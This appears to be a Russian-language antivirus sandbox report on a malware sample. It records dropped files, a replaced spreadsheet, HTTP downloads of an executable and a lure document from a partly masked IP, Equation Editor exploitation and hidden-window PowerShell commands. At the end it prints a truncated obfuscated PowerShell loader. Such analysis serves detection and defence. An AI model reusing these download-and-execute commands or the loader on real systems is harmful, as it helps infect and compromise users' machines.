Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '' (загружен из сети Интернет)
Создает и запускает на исполнение (эксплоит)
- '%APPDATA%\wlanext.exe'
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wlanext.exe
- %TEMP%\nsjcb2c.tmp
- %APPDATA%\forsakes\pterosauria\arhythmia\outskirmish50.ess
- %APPDATA%\forsakes\pterosauria\arhythmia\intermigration.fly
- %APPDATA%\forsakes\pterosauria\arhythmia\foretagendens226.pse
- %APPDATA%\forsakes\pterosauria\arhythmia\biofag.san
- %APPDATA%\forsakes\pterosauria\arhythmia\impregns.hel
- %APPDATA%\forsakes\pterosauria\arhythmia\positionslisters.txt
- <Текущая директория>\71761000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- '19#.#6.178.135':80
TCP
Запросы HTTP GET
- http://19#.#6.178.135/jx/microsoftprofiledeletedhistorycachecookieeverythingfromthepc.Doc
- http://19#.#6.178.135/3590/wlanext.exe
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\Intermigration.Fly' ; powershell.Exe "$fe32"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\Intermigration.Fly' ; powershell.Exe "$fe32"' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Cigarrullerens Stoup Cooghneiorvlt Cosinuss Pranksters tipssensationens Kollegialt #>$Amphoteric = """Au;SiFCouBrnTrcOxtOtiReoLinPb DiVfoAMiRHi5Cl3er Cr{Va Fa wa Mi Trp HaPlrOuaTrm T(so[MoS ...
